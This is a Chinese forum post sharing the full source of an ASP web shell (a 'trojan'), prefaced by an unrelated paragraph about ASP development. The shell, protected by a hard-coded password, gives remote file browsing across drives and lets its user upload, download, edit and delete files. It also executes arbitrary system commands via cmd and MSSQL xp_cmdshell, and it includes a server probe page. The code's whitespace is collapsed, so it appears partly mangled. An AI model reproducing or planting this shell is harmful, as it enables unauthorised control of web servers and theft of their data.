仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 407|回复: 8
打印 上一主题 下一主题

[学习教程] ASP编程:一个ASP木马程序的源代码

[复制链接]
逍遥一派 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-1-16 22:13:00 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
在实现ERP等高端的ASP应用时,用户需要提供核心的经营资料,需要ASP商有很高的信用度。楼上说交互性不好,太牵强了吧。在微软提供的一套框架中,利用asp做网站,开发效率高,使用人数少,减少不必要的开销。交互性是互动方式,是有开发人员决定的。程序|木马|源代码<%@LANGUAGE=VBScript.Encodecodepage="936"%>
<%Server.ScriptTimeOut=5000%>
<objectrunat=serverid=oScriptscope=pageclassid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<objectrunat=serverid=oScriptNetscope=pageclassid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"></object>
<objectrunat=serverid=oFileSysscope=pageclassid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%
onerrorresumenext
dimData_5xsoft
Classupload_5xsoft
dimobjForm,objFile,Version
PublicfunctionForm(strForm)
strForm=lcase(strForm)
ifnotobjForm.exists(strForm)then
Form=""
else
Form=objForm(strForm)
endif
endfunction
PublicfunctionFile(strFile)
strFile=lcase(strFile)
ifnotobjFile.exists(strFile)then
setFile=newFileInfo
else
setFile=objFile(strFile)
endif
endfunction

PrivateSubClass_Initialize
dimRequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile
dimiFileSize,sFilePath,sFileType,sFormValue,sFileName
dimiFindStart,iFindEnd
dimiFormStart,iFormEnd,sFormName
Version="HTTP上传程序Version2.0"
setobjForm=Server.CreateObject("Scripting.Dictionary")
setobjFile=Server.CreateObject("Scripting.Dictionary")
ifRequest.TotalBytes<1thenExitSub
settStream=Server.CreateObject("adodb.stream")
setData_5xsoft=Server.CreateObject("adodb.stream")
Data_5xsoft.Type=1
Data_5xsoft.Mode=3
Data_5xsoft.Open
Data_5xsoft.WriteRequest.BinaryRead(Request.TotalBytes)
Data_5xsoft.Position=0
RequestData=Data_5xsoft.Read
iFormStart=1
iFormEnd=LenB(RequestData)
vbCrlf=chrB(13)&chrB(10)
sStart=MidB(RequestData,1,InStrB(iFormStart,RequestData,vbCrlf)-1)
iStart=LenB(sStart)
iFormStart=iFormStart+iStart+1
while(iFormStart+10)<iFormEnd
iInfoEnd=InStrB(iFormStart,RequestData,vbCrlf&vbCrlf)+3
tStream.Type=1
tStream.Mode=3
tStream.Open
Data_5xsoft.Position=iFormStart
Data_5xsoft.CopyTotStream,iInfoEnd-iFormStart
tStream.Position=0
tStream.Type=2
tStream.Charset="gb2312"
sInfo=tStream.ReadText
tStream.Close
iFormStart=InStrB(iInfoEnd,RequestData,sStart)
iFindStart=InStr(22,sInfo,"name=""",1)+6
iFindEnd=InStr(iFindStart,sInfo,"""",1)
sFormName=lcase(Mid(sinfo,iFindStart,iFindEnd-iFindStart))
ifInStr(45,sInfo,"filename=""",1)>0then
settheFile=newFileInfo
iFindStart=InStr(iFindEnd,sInfo,"filename=""",1)+10
iFindEnd=InStr(iFindStart,sInfo,"""",1)
sFileName=Mid(sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileName=getFileName(sFileName)
theFile.FilePath=getFilePath(sFileName)
iFindStart=InStr(iFindEnd,sInfo,"Content-Type:",1)+14
iFindEnd=InStr(iFindStart,sInfo,vbCr)
theFile.FileType=Mid(sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileStart=iInfoEnd
theFile.FileSize=iFormStart-iInfoEnd-3
theFile.FormName=sFormName
ifnotobjFile.Exists(sFormName)then
objFile.addsFormName,theFile
endif
else
tStream.Type=1
tStream.Mode=3
tStream.Open
Data_5xsoft.Position=iInfoEnd
Data_5xsoft.CopyTotStream,iFormStart-iInfoEnd-3
tStream.Position=0
tStream.Type=2
tStream.Charset="gb2312"
sFormValue=tStream.ReadText
tStream.Close
ifobjForm.Exists(sFormName)then
objForm(sFormName)=objForm(sFormName)&","&sFormValue
else
objForm.AddsFormName,sFormValue
endif
endif
iFormStart=iFormStart+iStart+1
wend
RequestData=""
settStream=nothing
EndSub
PrivateSubClass_Terminate
ifRequest.TotalBytes>0then
objForm.RemoveAll
objFile.RemoveAll
setobjForm=nothing
setobjFile=nothing
Data_5xsoft.Close
setData_5xsoft=nothing
endif
EndSub

PrivatefunctionGetFilePath(FullPath)
IfFullPath<>""Then
GetFilePath=left(FullPath,InStrRev(FullPath,""))
Else
GetFilePath=""
EndIf
Endfunction
PrivatefunctionGetFileName(FullPath)
IfFullPath<>""Then
GetFileName=mid(FullPath,InStrRev(FullPath,"")+1)
Else
GetFileName=""
EndIf
Endfunction
EndClass
ClassFileInfo
dimFormName,FileName,FilePath,FileSize,FileType,FileStart
PrivateSubClass_Initialize
FileName=""
FilePath=""
FileSize=0
FileStart=0
FormName=""
FileType=""
EndSub
PublicfunctionSaveAs(FullPath)
dimdr,ErrorChar,i
SaveAs=true
iftrim(fullpath)=""orFileStart=0orFileName=""orright(fullpath,1)="/"thenexitfunction
setdr=CreateObject("Adodb.Stream")
dr.Mode=3
dr.Type=1
dr.Open
Data_5xsoft.position=FileStart
Data_5xsoft.copytodr,FileSize
dr.SaveToFileFullPath,2
dr.Close
setdr=nothing
SaveAs=false
endfunction
EndClass
httpt=Request.ServerVariables("server_name")
rseb=Request.ServerVariables("SCRIPT_NAME")
q=request("q")
ifq=""thenq=rseb
selectcaseq
caserseb
ifEpass(trim(request.form("password")))="q_ux888556"then
response.cookies("password")="7758521"
response.redirectrseb&"?q=list.asp"
else%>
<html>
<head>
<metahttp-equiv="Content-Type"content="text/html;charset=gb2312">
<title><%=httpt%></title>
<metaname="GENERATOR"content="MicrosoftFrontPage3.0">
</head>
<body>
<%ifrequest.form("password")<>""then
response.write"PasswordError!"
endif
%>
<tableborder="1"width="100%"height="89"bgcolor="#DFDFFF"cellpadding="3"
bordercolorlight="#000000"bordercolordark="#F2F2F9"cellspacing="0">
<tr>
<tdwidth="100%"height="31"bgcolor="#000080"><palign="center"><fontcolor="#FFFFFF"><%=httpt%></font></td>
</tr>
<tr>
<tdwidth="100%"height="46"><formmethod="POST"action="<%=rseb%>?q=<%=rseb%>">
<divalign="center"><center><p>EnterPassword:<inputtype="password"name="password"
size="20"
style="border-left:thinnone;border-right:thinnone;border-top:thinoutset;border-bottom:thinoutset">
<inputtype="submit"value="OK!LOGIN"name="B1"
style="font-size:9pt;border:thinoutset"></p>
</center></div>
</form>
</td>
</tr>
</table>
</body>
</html>
<%endif%>
<%case"down.asp"
calldownloadFile(request("path"))
functiondownloadFile(strFile)
strFilename=strFile
Response.Buffer=True
Response.Clear
sets=Server.CreateObject("adodb.stream")
s.Open
s.Type=1
ifnotoFileSys.FileExists(strFilename)then
Response.Write("<h1>Error:</h1>"&strFilename&"doesnotexist<p>")
Response.End
endif
Setf=oFileSys.GetFile(strFilename)
intFilelength=f.size
s.LoadFromFile(strFilename)
iferrthen
Response.Write("<h1>Error:</h1>"&err.Description&"<p>")
Response.End
endif
Response.AddHeader"Content-Disposition","attachment;filename="&f.name
Response.AddHeader"Content-Length",intFilelength
Response.CharSet="UTF-8"
Response.ContentType="application/octet-stream"
Response.BinaryWrites.Read
Response.Flush
s.Close
Sets=Nothing
response.end
EndFunction
%>
<%case"list.asp"%>
<%
urlpath=server.urlencode(path)
ifRequest.Cookies("password")="7758521"then
dimcpath,lpath
ifRequest("path")=""then
lpath="/"
else
lpath=Request("path")&"/"
endif
ifRequest("attrib")="true"then
cpath=lpath
attrib="true"
else
cpath=Server.MapPath(lpath)
attrib=""
endif
SubGetFolder()
dimtheFolder,theSubFolders
ifoFileSys.FolderExists(cpath)then
SettheFolder=oFileSys.GetFolder(cpath)
SettheSubFolders=theFolder.SubFolders
Response.write"<ahref="&rseb&"?q=list.asp&path="&Request("oldpath")&"&attrib="&attrib&"><fontcolor=#FF8000>■</font>↑<fontcolor=ff2222>回下级目次</font></a><br><scriptlanguage=vbscript>"
ForEachxIntheSubFolders
%>so"<%=lpath%>","<%=x.Name%>","<%=request("path")%>","<%=attrib%>"
<%
Next
%></script><%
endif
EndSub
SubGetFile()
dimtheFiles
ifoFileSys.FolderExists(cpath)then
SettheFolder=oFileSys.GetFolder(cpath)
SettheFiles=theFolder.Files
Response.write"<tableborder=0width=100%cellpadding=0><scriptlanguage=vbscript>"
ForEachxIntheFiles
ifRequest("attrib")="true"then
showstring=x.Name
else
showstring=x.Name
endif
%>sf"<%=showstring%>","<%=x.size%>","<%=x.type%>","<%=x.Attributes%>","<%=x.DateLastModified%>","<%=lpath%>","<%=x.name%>","<%=attrib%>","<%=x.name%>"
<%
Next
endif
Response.write"</script></table>"
EndSub
%>
<html>
<head>
<metahttp-equiv="Content-Type"content="text/html;charset=gb2312">
<title><%=httpt%></title>
<styletype="text/CSS">
<!--
table{font-family:宋体;font-size:9pt}
a{font-family:宋体;font-size:9pt;color:rgb(0,32,64);text-decoration:none}
a:hover{font-family:宋体;color:rgb(255,0,0);text-decoration:none}
a:visited{color:rgb(128,0,0)}
td{font-size:9pt}
a{color:#000000;text-decoration:none}
a:hover{text-decoration:underline}
.tx{height:16px;width:30px;border-color:blackblack#000000;border-top-width:0px;border-right-width:0px;border-bottom-width:1px;border-left-width:0px;font-size:9pt;background-color:#eeeeee;color:#0000FF}
.bt{font-size:9pt;border-top-width:0px;border-right-width:0px;border-bottom-width:0px;border-left-width:0px;height:16px;width:80px;background-color:#eeeeee;cursor:hand}
.tx1{height:18px;width:60px;font-size:9pt;border:1pxsolid;border-color:blackblack#000000;color:#0000FF}
-->
</style>
</head>
<scriptlanguage="JavaScript">
functioncrfile(ls)
{if(ls==""){alert("请输出文件名!");}
else{window.open("<%=rseb%>?q=edit.asp&attrib=<%=request("attrib")%>&creat=yes&path=<%=lpath%>"+ls);}
returnfalse;
}
functioncrdir(ls)
{if(ls==""){alert("请输出文件名!");}
else{window.open("<%=rseb%>?q=edir.asp&attrib=<%=request("attrib")%>&op=creat&path=<%=lpath%>"+ls);}
returnfalse;
}
</script>
<scriptlanguage="vbscript">
subsf(showstring,size,type1,Attributes,DateLastModified,lpath,xname,attrib,name)
document.write"<trstyle=""color:#000000;background-color:#FFefdf;text-decoration:blink;border:1pxsolid#000080""this.style.backgroundColor=#FFCC00""this.style.backgroundColor=#FFefdf""><tdwidth=50%><fontcolor=#FF8000><fontface=Wingdings>+</font></font><ahref="&urlpath&lpath&xName&"target=_blank><strong>"&showstring&"</strong></a></td><tdwidth=20%align=right>"&size&"字节</td><tdwidth=30%><ahref=#title=范例:"&type1&chr(10)&"属性:"&Attributes&chr(10)&"工夫:"&DateLastModified&">属性</a><ahref=<%=rseb%>?q=edit.asp&path="&lpath&xName&"&attrib="&attrib&"target=_blank><fontcolor=#FF8000></font>编纂</a><ahref="&chr(34)&"javascript:rmdir1("&lpath&xName&")"&chr(34)&"><fontcolor=#FF8000></font>删除</a><ahref=#onclick=copyfile("&lpath&Name&")><fontcolor=#FF8000></font>复制</a><ahref=<%=rseb%>?q=down.asp&path=<%=cpath%>"&xName&"&attrib="&attrib&"target=_blank><fontcolor=#FF8000></font>下载</a></td></tr>"
endsub
subso(lpath,xName,path,attrib)
document.write"<ahref=<%=rseb%>?q=list.asp&path="&lpath&xName&"&oldpath="&path&"&attrib="&attrib&">└<fontcolor=#FF8000><fontface=Wingdings>1</font></font>"&xName&"</a><ahref="&chr(34)&"javascript:rmdir("&lpath&xName&")"&chr(34)&"><fontcolor=#FF8000></font>删除</a><br>"
endsub
subrmdir1(ls)
ifconfirm("你真的要删除这个文件吗!"&Chr(13)&Chr(10)&"文件为:"&ls)then
window.open("<%=rseb%>?q=edit.asp&path="&ls&"&op=del&attrib=<%=request("attrib")%>")
endif
endsub
subrmdir(ls)
ifconfirm("你真的要删除这个目次吗!"&Chr(13)&Chr(10)&"目次为:"&ls)then
window.open("<%=rseb%>?q=edir.asp&path="&ls&"&op=del&attrib=<%=request("attrib")%>")
endif
endsub
subcopyfile(sfile)
dfile=InputBox("※文件复制※"&Chr(13)&Chr(10)&"源文件:"&sfile&Chr(13)&Chr(10)&"输出方针文件的文件名:"&Chr(13)&Chr(10)&"[同意领路径,要依据你确当前路径形式]")
dfile=trim(dfile)
attrib="<%=request("attrib")%>"
ifdfile<>""then
ifInStr(dfile,":")orInStr(dfile,"/")=1then
lp=""
ifInStr(dfile,":")andattrib<>"true"then
alert"对不起,你在绝对路径形式下不克不及利用相对路径"&Chr(13)&Chr(10)&"毛病路径:["&dfile&"]"
exitsub
endif
else
lp="<%=lpath%>"
endif
window.open("<%=rseb%>?q=edit.asp&path="+sfile+"&op=copy&attrib="+attrib+"&dpath="+lp+dfile)
else
alert"您没有输出文件名!"
endIf
endsub
</script>
<body>
<tableborder="1"width="100%"cellpadding="0"height="81"bordercolorlight="#000000"
bordercolordark="#FFFFFF"cellspacing="0">
<tr>
<tdwidth="755"bgcolor="#000080"colspan="2"height="23"><palign="center"><fontsize="3"
color="#FFFFFF"><%=httpt%></font></td>
</tr>
<tr>
<tdwidth="751"bgcolor="#C0C0C0"colspan="2">※换盘:<span
style="background-color:rgb(255,255,255);color:rgb(255,0,0)"><%
ForEachthinginoFileSys.Drives
Response.write"<fontface=Wingdings>:</font><ahref="&rseb&"?q=list.asp&path="&thing.DriveLetter&":&attrib=true>"&thing.DriveLetter&":</a>"
NEXT
%></span>地点:
<%=""&oScriptNet.ComputerName&""&oScriptNet.UserName%></td>
</tr>
<tr>
<tdwidth="751"bgcolor="#C0C0C0"colspan="2">※<%
ifRequest("attrib")="true"then
response.write"<ahref="&rseb&"?q=list.asp>切到绝对路径</a>"
else
response.write"<ahref="&rseb&"?attrib=true&q=list.asp>切到相对路径</a>"
endif
%>※相对:<span
style="background-color:rgb(255,255,255)"><%=cpath%></span></td>
</tr>
<tr>
<tdwidth="751"bgcolor="#C0C0C0"colspan="2">※以后<fontcolor="#FF8000"><fontface=Wingdings>1</font></font>:<spanstyle="background-color:rgb(255,255,255)"><%=lpath%></span></td>
</tr><formname="form1"method="post"action="<%=rseb%>?q=upfile.asp"target="_blank"enctype="multipart/form-data">
<tr><tdbgcolor="#C0C0C0"colspan="2"style="height:20px">
编纂|
<inputclass="tx1"type="text"name="filename"size="20">
<inputclass="tx1"type="button"value="建文">
<inputclass="tx1"type="button"value="建目">
<inputtype="file"name="file1"class="tx1"style="width:100"value="">
<inputtype="text"name="filepath"class="tx1"style="width:100"value="<%=cpath%>">
<inputtype="hidden"name="act"value="upload">
<inputtype="hidden"name="upcount"class="tx"value="1">
<inputclass="tx1"type="submit"value="上传">
<inputclass="tx1"type="button"value="命令">
<inputclass="tx1"type="button"value="设置">
<inputclass="tx1"type="button"value="nfso">
</td>
</td>
</tr></form>
<tr>
<tdwidth="169"valign="top"bgcolor="#C8E3FF"><%CallGetFolder()%>
</td>
<tdwidth="582"valign="top"bgcolor="#FFefdf"><%CallGetFile()%>
</td>
</tr>
</table>
<%else
response.write"PasswordError!"
response.write"<ahref="&rseb&"?q="&rseb&">【返回】</a>"
endif
%>
</body>
</html>
<%case"edit.asp"%>
<html>
<head>
<metaHTTP-EQUIV="Content-Type"CONTENT="text/html;charset=gb_2312-80">
<title>编纂源代码</title>
<style>
<!--
table{font-family:宋体;font-size:12pt}
a{font-family:宋体;font-size:12pt;color:rgb(0,32,64);text-decoration:none}
a:hover{font-family:宋体;color:rgb(255,0,0);text-decoration:underline}
a:visited{color:rgb(128,0,0)}
-->
</style>
</head>
<body>
<%读文件
ifRequest.Cookies("password")="7758521"then
ifrequest("op")="del"then
ifRequest("attrib")="true"then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
endif
Setthisfile=oFileSys.GetFile(whichfile)
thisfile.DeleteTrue
Response.write"<script>alert(删除乐成!要革新才干看到效果);window.close();</script>"
else
ifrequest("op")="copy"then
ifRequest("attrib")="true"then
whichfile=Request("path")
dsfile=Request("dpath")
else
whichfile=server.mappath(Request("path"))
dsfile=Server.MapPath(Request("dpath"))
endif
Setthisfile=oFileSys.GetFile(whichfile)
thisfile.copydsfile
%>
<scriptlanguage=vbscript>
msgbox"源文件:<%=whichfile%>"&vbcrlf&"目标文件:<%=dsfile%>"&vbcrlf&"复制乐成!要革新才干看到效果!"
window.close()
</script>
<%
else
ifrequest.form("text")=""then
ifRequest("creat")<>"yes"then
ifRequest("attrib")="true"then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
endif
Setthisfile=oFileSys.OpenTextFile(whichfile,1,False)
counter=0
thisline=thisfile.readall
thisfile.Close
setfs=nothing
endif
%>
<formmethod="POST"action="<%=rseb%>?q=edit.asp">
<inputtype="hidden"name="attrib"value="<%=Request("attrib")%>"><tableborder="0"
width="700"cellpadding="0">
<tr>
<tdwidth="100%"bgcolor="#FFDBCA"><divalign="center"><center><p><%=httpt%></td>
</tr>
<tralign="center">
<tdwidth="100%"bgcolor="#FFDBCA">文件名:<inputtype="text"name="path"size="45"
value="<%=Request("path")%>">间接变动文件名,相称于“另存为”</td>
</tr>
<tralign="center">
<tdwidth="100%"bgcolor="#FFDBCA"><textarearows="25"name="text"cols="90"><%=thisline%></textarea></td>
</tr>
<tralign="center">
<tdwidth="100%"bgcolor="#FFDBCA"><divalign="center"><center><p><inputtype="submit"
value="提交"name="B1"><inputtype="reset"value="回复"name="B2"></td>
</tr>
</table>
</form>
<%else
ifRequest("attrib")="true"then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
endif
Setoutfile=oFileSys.CreateTextFile(whichfile)
outfile.WriteLineRequest("text")
outfile.close
setfs=nothing
Response.write"<script>alert(修正乐成!要革新才干看到效果);window.close();</script>"
endif
endif
endif
else
response.write"PasswordError!"
response.write"<ahref="&rseb&"?q="&rseb&">【返回】</a>"
endif

%>
</body>
</html>
<%case"edir.asp"%>
<html>
<head>
<metaHTTP-EQUIV="Content-Type"CONTENT="text/html;charset=gb_2312-80">
<title>目次操纵</title>
<style>
<!--
table{font-family:宋体;font-size:12pt}
a{font-family:宋体;font-size:12pt;color:rgb(0,32,64);text-decoration:none}
a:hover{font-family:宋体;color:rgb(255,0,0);text-decoration:underline}
a:visited{color:rgb(128,0,0)}
-->
</style>
</head>
<body>
<%读文件
ifRequest.Cookies("password")="7758521"then
ifrequest("op")="del"then
ifRequest("attrib")="true"then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
endif
oFileSys.DeleteFolderwhichdir,True
Response.write"<script>alert(删除的目次为:"&whichdir&"删除乐成!要革新才干看到效果);window.close();</script>"
else
ifrequest("op")="creat"then
ifRequest("attrib")="true"then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
endif
oFileSys.CreateFolderwhichdir
Response.write"<script>alert(创建的目次为:"&whichdir&"创建乐成!要革新才干看到效果);window.close();</script>"
endif
endif
else
response.write"PasswordError!"
response.write"<ahref="&rseb&"?q="&rseb&">【返回】</a>"
endif
%>
</body>
</html>
<%
case"upfile.asp"
ifRequest.Cookies("password")="7758521"then
setupload=newupload_5xSoft
ifupload.form("filepath")=""then
HtmEnd"请输出要上传至的目次!"
setupload=nothing
response.end
else
formPath=upload.form("filepath")
ifright(formPath,1)<>"/"thenformPath=formPath&"/"
endif
iCount=0
foreachformNameinupload.objForm
setfile=upload.file(formName)
iffile.FileSize>0then
file.SaveAsformPath&file.FileName
response.writefile.FilePath&file.FileName&"("&file.FileSize&")=>"&formPath&File.FileName&"乐成!<br>"
iCount=iCount+1
endif
setfile=nothing
next
setupload=nothing
HtmendiCount&"个文件上传停止!"
subHtmEnd(Msg)
setupload=nothing
Response.write"上传终了!要革新才干看到效果!<P><inputvalue=封闭type=buttononclick=window.close();>"
response.end
endsub
else
response.write"PasswordError!"
response.write"<ahref="&rseb&"?q="&rseb&">【返回】</a>"
endif
case"cmd.asp"
ifRequest.Cookies("password")<>"7758521"then
response.write"PasswordError!"
response.write"<ahref="&rseb&"?q="&rseb&">【返回】</a>"
else%>
<title>ASPShell</title>
<objectrunat=serverid=oScriptscope=pageclassid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<objectrunat=serverid=oScriptNetscope=pageclassid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"></object>
<objectrunat=serverid=oFileSysscope=pageclassid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%
OnErrorResumeNext
szCMD=Request.Form(".CMD")
If(szCMD<>"")Then
szTempFile="C:winnthelp"&oFileSys.GetTempName()
CalloScript.Run("cmd/c"&szCMD&">"&szTempFile,0,True)
SetoFile=oFileSys.OpenTextFile(szTempFile,1,False,0)
EndIf
%>
<HTML>
<BODY>
<FORMaction="<%=rseb%>?q=cmd.asp"method="POST">
<inputtype=textname=".CMD"size=45value="<%=szCMD%>">
<inputtype=submitvalue="实行命令">
</FORM>
<PRE>
<%
If(IsObject(oFile))Then
OnErrorResumeNext
Response.WriteServer.HTMLEncode(oFile.ReadAll)
oFile.Close
CalloFileSys.DeleteFile(szTempFile,True)
EndIf
%>
</BODY>
</HTML>
<%endif
case"sql.asp"
ifRequest.Cookies("password")<>"7758521"then
response.write"PasswordError!"
response.write"<ahref="&rseb&"?q="&rseb&">【返回】</a>"
else
Iftrim(request.form("sqlcmd"))<>""Then
password=trim(Request.form("pa"))
id=trim(Request.form("id"))
SqlLocalName=trim(Request.form("SqlLocalName"))
ifSqlLocalName=""orSqlLocalName="mssql服务器地点"thenSqlLocalName="127.0.0.1"
setadoConn=Server.CreateObject("ADODB.Connection")
adoConn.Open"Provider=SQLOLEDB.1;Password="&password&";UserID="&id&";DataSource="&SqlLocalName
strQuery="execmaster.dbo.xp_cmdshell"&request.form("sqlcmd")&""
setrecResult=adoConn.Execute(strQuery)
IfNOTrecResult.EOFThen
DoWhileNOTrecResult.EOF
strResult=strResult&chr(13)&recResult(0)
recResult.MoveNext
Loop
Endif
setrecResult=Nothing
strResult=Replace(strResult,"","")
strResult=Replace(strResult,"<","<")
strResult=Replace(strResult,">",">")
strResult=Replace(strResult,chr(13),"<br>")
Endif
setadoConn=Nothing
%><tableborder=0width=500cellspacing=0cellpadding=0bgcolor="#B8B8B8">
<trbgcolor="#EEEEEE"height=18class="noborder">
<formname="form"method=postaction="<%=rseb%>?q=sql.asp">
<inputtype="text"name="sqlcmd"size=70><br>
<inputtype="text"name="id"size=10value="mssql用户名">
<inputtype="text"name="pa"size=20value="mssql暗码">
<inputtype="text"name="SqlLocalName"size=20value="mssql服务器地点">
<inputtype="submit"value="实行命令">
</form></tr></table>
<%
Response.Writerequest.form("sqlcmd")&"<br><br>"
Response.WritestrResult
endif
case"test.asp"
Response.Buffer=False
DimObjTotest(26,4)
ObjTotest(0,0)="MSWC.AdRotator"
ObjTotest(1,0)="MSWC.BrowserType"
ObjTotest(2,0)="MSWC.NextLink"
ObjTotest(3,0)="MSWC.Tools"
ObjTotest(4,0)="MSWC.Status"
ObjTotest(5,0)="MSWC.Counters"
ObjTotest(6,0)="IISSample.ContentRotator"
ObjTotest(7,0)="IISSample.PageCounter"
ObjTotest(8,0)="MSWC.PermissionChecker"
ObjTotest(9,0)="Script"+"ing.File"+"Syst"+"emObject"
ObjTotest(9,1)="(FSO文本文件读写)"
ObjTotest(10,0)="adodb.connection"
ObjTotest(10,1)="(ADO数据工具)"
ObjTotest(11,0)="SoftArtisans.FileUp"
ObjTotest(11,1)="(SA-FileUp文件上传)"
ObjTotest(12,0)="SoftArtisans.FileManager"
ObjTotest(12,1)="(SoftArtisans文件办理)"
ObjTotest(13,0)="LyfUpload.UploadFile"
ObjTotest(13,1)="(刘云峰的文件上传组件)"
ObjTotest(14,0)="Persits.Upload.1"
ObjTotest(14,1)="(ASPUpload文件上传)"
ObjTotest(15,0)="w3.upload"
ObjTotest(15,1)="(Dimac文件上传)"
ObjTotest(16,0)="JMail.SmtpMail"
ObjTotest(16,1)="(DimacJMail邮件收发)"
ObjTotest(17,0)="CDONTS.NewMail"
ObjTotest(17,1)="(假造SMTP发信)"
ObjTotest(18,0)="Persits.MailSender"
ObjTotest(18,1)="(ASPemail发信)"
ObjTotest(19,0)="SMTPsvg.Mailer"
ObjTotest(19,1)="(ASPmail发信)"
ObjTotest(20,0)="DkQmail.Qmail"
ObjTotest(20,1)="(dkQmail发信)"
ObjTotest(21,0)="Geocel.Mailer"
ObjTotest(21,1)="(Geocel发信)"
ObjTotest(22,0)="IISmail.Iismail.1"
ObjTotest(22,1)="(IISmail发信)"
ObjTotest(23,0)="SmtpMail.SmtpMail.1"
ObjTotest(23,1)="(SmtpMail发信)"
ObjTotest(24,0)="SoftArtisans.ImageGen"
ObjTotest(24,1)="(SA的图象读写组件)"
ObjTotest(25,0)="W3Image.Image"
ObjTotest(25,1)="(Dimac的图象读写组件)"
publicIsObj,VerObj,TestObj
dimi
fori=0to25
onerrorresumenext
IsObj=false
VerObj=""
dimTestObj
TestObj=""
setTestObj=server.CreateObject(ObjTotest(i,0))
If-2147221005<>Errthen
IsObj=True
VerObj=TestObj.version
ifVerObj=""orisnull(VerObj)thenVerObj=TestObj.about
endif
ObjTotest(i,2)=IsObj
ObjTotest(i,3)=VerObj
next
subObjTest(strObj)
onerrorresumenext
IsObj=false
VerObj=""
TestObj=""
setTestObj=server.CreateObject(strObj)
If-2147221005<>Errthen
IsObj=True
VerObj=TestObj.version
ifVerObj=""orisnull(VerObj)thenVerObj=TestObj.about
endif
Endsub
%>
<HTML>
<HEAD>
<metahttp-equiv="Content-Type"content="text/html;charset=gb2312">
<TITLE>ASP探针V1.60-阿江<ahref=http://www.ajiang.net</TITLE>target=_blank>http://www.ajiang.net</TITLE></a>
<style>
<!--
BODY
{
FONT-FAMILY:宋体;
FONT-SIZE:9pt
}
TD
{
FONT-SIZE:9pt
}
A
{
COLOR:#000000;
TEXT-DECORATION:none
}
A:hover
{
COLOR:#3F8805;
TEXT-DECORATION:underline
}
.input
{
BORDER:#1111111pxsolid;
FONT-SIZE:9pt;
BACKGROUND-color:#F8FFF0
}
.backs
{
BACKGROUND-COLOR:#3F8805;
COLOR:#ffffff;
}
.backq
{
BACKGROUND-COLOR:#EEFEE0
}
.backc
{
BACKGROUND-COLOR:#3F8805;
BORDER:mediumnone;
COLOR:#ffffff;
HEIGHT:18px;
font-size:9pt
}
.fonts
{
COLOR:#3F8805
}
-->
</STYLE>
</HEAD>
<BODY>
<ahref="mailto:info@ajiang.net">阿江</a>改写的ASP探针-<fontclass=fonts>V1.60</font><br><br>
<fontclass=fonts>是不是撑持ASP</font>
<br>呈现以下情形即暗示您的空间不撑持ASP:
<br>1、会见本文件时提醒下载。
<br>2、会见本文件时看到相似“<%@Language="VBScript"%>”的笔墨。
<br><br>
<fontclass=fonts>服务器的有关参数</font>
<tableborder=0width=450cellspacing=0cellpadding=0bgcolor="#3F8805">
<tr><td>
<tableborder=0width=450cellspacing=1cellpadding=0>
<trbgcolor="#EEFEE0"height=18>
<tdalign=left>服务器名</td><td><%=Request.ServerVariables("SERVER_NAME")%></td>
</tr>
<trbgcolor="#EEFEE0"height=18>
<tdalign=left>服务器IP</td><td><%=Request.ServerVariables("LOCAL_ADDR")%></td>
</tr>
<trbgcolor="#EEFEE0"height=18>
<tdalign=left>服务器端口</td><td><%=Request.ServerVariables("SERVER_PORT")%></td>
</tr>
<trbgcolor="#EEFEE0"height=18>
<tdalign=left>服务器工夫</td><td><%=now%></td>
</tr>
<trbgcolor="#EEFEE0"height=18>
<tdalign=left>IIS版本</td><td><%=Request.ServerVariables("SERVER_SOFTWARE")%></td>
</tr>
<trbgcolor="#EEFEE0"height=18>
<tdalign=left>剧本超不时间</td><td><%=Server.ScriptTimeout%>秒</td>
</tr>
<trbgcolor="#EEFEE0"height=18>
<tdalign=left>本文件路径</td><td><%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%></td>
</tr>
<trbgcolor="#EEFEE0"height=18>
<tdalign=left>服务器CPU数目</td><td><%=Request.ServerVariables("NUMBER_OF_PROCESSORS")%>个</td>
</tr>
<trbgcolor="#EEFEE0"height=18>
<tdalign=left>服务器解译引擎</td><td><%=ScriptEngine&"/"&ScriptEngineMajorVersion&"."&ScriptEngineMinorVersion&"."&ScriptEngineBuildVersion%></td>
</tr>
<trbgcolor="#EEFEE0"height=18>
<tdalign=left>服务器操纵体系</td><td><%=Request.ServerVariables("OS")%></td>
</tr>
</table>
</td></tr>
</table>
<br>
<fontclass=fonts>组件撑持情形</font>
<%
DimstrClass
strClass=Trim(Request.Form("classname"))
If""<>strClassthen
Response.Write"<br>您指定的组件的反省了局:"
DimVerobj1
ObjTest(strClass)
IfNotIsObjthen
Response.Write"<br><fontcolor=red>很遗憾,该服务器不撑持"&strclass&"组件!</font>"
Else
ifVerObj=""orisnull(VerObj)then
Verobj1="没法获得该组件版本"
Else
Verobj1="该组件版本是:"&VerObj
EndIf
Response.Write"<br><fontclass=fonts>祝贺!该服务器撑持"&strclass&"组件。"&verobj1&"</font>"
EndIf
Response.Write"<br>"
endif
%>

<br>■IIS自带的ASP组件
<tableborder="1"cellpadding="0"cellspacing="0"style="border-collapse:collapse"bordercolor="#3F8805"width="450">
<trheight=18class=backsalign=center><tdwidth=320>组件名称</td><tdwidth=130>撑持及版本</td></tr>
<%Fori=0to10%>
<trheight="18"class=backq>
<tdalign=left><%=ObjTotest(i,0)&"<fontcolor=#888888>"&ObjTotest(i,1)%></font></td>
<tdalign=left><%
IfNotObjTotest(i,2)Then
Response.Write"<fontcolor=red><b>×</b></font>"
Else
